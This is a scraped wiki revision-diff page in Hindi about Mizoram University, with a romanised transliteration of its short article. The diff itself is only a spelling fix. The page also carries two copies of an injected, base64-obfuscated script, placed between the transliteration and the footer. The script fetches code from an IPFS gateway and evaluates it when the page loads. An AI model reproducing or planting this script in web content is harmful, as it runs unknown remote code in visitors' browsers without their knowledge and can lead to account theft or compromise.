Difference between revisions of "मिज़ोरम विश्वविद्यालय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत गणराज्य में मिज़ोरम पूर्वोत्तर पर्वतीय प्...' के साथ नया पन्ना बनाया)
 
m (Text replace - "मिजोरम" to "मिज़ोरम")
Line 1: Line 1:
 
*[[भारत]] गणराज्य में [[मिज़ोरम]] पूर्वोत्तर पर्वतीय प्रदेश है।   
 
*[[भारत]] गणराज्य में [[मिज़ोरम]] पूर्वोत्तर पर्वतीय प्रदेश है।   
*मिजोरम विश्वविद्यालय की [[आईजोल]] मुख्यालय सहित स्थापना एक शिक्षण एवं संबंधन विश्वविद्यालय के रूप में [[2 जुलाई]], [[2001]] को की गई थी।  
+
*मिज़ोरम विश्वविद्यालय की [[आईजोल]] मुख्यालय सहित स्थापना एक शिक्षण एवं संबंधन विश्वविद्यालय के रूप में [[2 जुलाई]], [[2001]] को की गई थी।  
*मिजोरम विश्वविद्यालय का क्षेत्राधिकार पूरे मिजोरम में फैला हुआ है जो पूर्व में [[पूर्वोत्तर पर्वतीय विश्वविद्यालय]], [[शिलांग]] का मिजोरम परिसर का क्षेत्राधिकार था, जिसने [[1 जुलाई]] [[2001]] तक कार्य किया।
+
*मिज़ोरम विश्वविद्यालय का क्षेत्राधिकार पूरे मिज़ोरम में फैला हुआ है जो पूर्व में [[पूर्वोत्तर पर्वतीय विश्वविद्यालय]], [[शिलांग]] का मिज़ोरम परिसर का क्षेत्राधिकार था, जिसने [[1 जुलाई]] [[2001]] तक कार्य किया।
 
*वर्तमान में विश्वविद्यालय की अकादमिक गतिविधियां इसके 7 अध्ययन स्कूलों, 28 विभागों के माध्यम से संचालित की जाती हैं।  
 
*वर्तमान में विश्वविद्यालय की अकादमिक गतिविधियां इसके 7 अध्ययन स्कूलों, 28 विभागों के माध्यम से संचालित की जाती हैं।  
 
*वर्तमान में, 2 व्यावसायिक संस्थानों और एक [[विश्वविद्यालय]] से संबध्द घटक कॉलेज सहित 26 अवर स्नातक कॉलेज हैं।  
 
*वर्तमान में, 2 व्यावसायिक संस्थानों और एक [[विश्वविद्यालय]] से संबध्द घटक कॉलेज सहित 26 अवर स्नातक कॉलेज हैं।  

Revision as of 16:00, 8 July 2011

  • bharat ganarajy mean mizoram poorvottar parvatiy pradesh hai.
  • mizoram vishvavidyalay ki aeejol mukhyalay sahit sthapana ek shikshan evan sanbandhan vishvavidyalay ke roop mean 2 julaee, 2001 ko ki gee thi.
  • mizoram vishvavidyalay ka kshetradhikar poore mizoram mean phaila hua hai jo poorv mean poorvottar parvatiy vishvavidyalay, shilaang ka mizoram parisar ka kshetradhikar tha, jisane 1 julaee 2001 tak kary kiya.
  • vartaman mean vishvavidyalay ki akadamik gatividhiyaan isake 7 adhyayan skooloan, 28 vibhagoan ke madhyam se sanchalit ki jati haian.
  • vartaman mean, 2 vyavasayik sansthanoan aur ek vishvavidyalay se sanbadhd ghatak k aaulej sahit 26 avar snatak k aaulej haian.


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh